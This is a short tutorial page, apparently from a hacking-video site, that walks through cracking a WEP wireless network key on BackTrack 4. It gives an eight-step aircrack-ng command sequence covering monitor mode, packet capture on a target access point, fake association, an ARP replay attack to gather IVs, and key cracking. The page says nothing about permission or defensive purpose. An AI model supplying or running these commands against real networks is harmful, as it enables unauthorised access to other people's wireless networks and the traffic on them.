H4ck3r V1d30s

Hacking/Cracking WEP Key with BackTrack 4


This is a simple, yet effective, WEP Cracking tutorial...
you should be able to read the commands quite easily :)

In this video i am using BackTrack 4

The wireless reciever i used was the Linksys WUSB54GC, however i also have an Alfa-AWUS036h which i highly reccomend. This linksys card and the alfa card work straigth out of the box for backtrack.

Commands:

1) ifconfig wlan0 up - (Load my wireless NIC)
2) airmon-ng start wlan0 - (Put my NIC into monitor mode) - Card is now "mon0"
3) airodump-ng mon0 - (scan for wireless AP's(Access Points))
4) airodump-ng -c 1 --bssid xx:xx:xx:xx:xx:xx -w wep mon0 - (save all traffic from channel 1 and bssid to wep file

5) new terminal: aireplay-ng -1 1 -a xx:xx:xx:xx:xx:xx mon0 - (associate my IP with the AP)
6) new terminal: aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0 - (use ARPreplay attack and gather data)
7) wait for around 50,000 IV's (data)
8) aircrack-ng wep-01.cap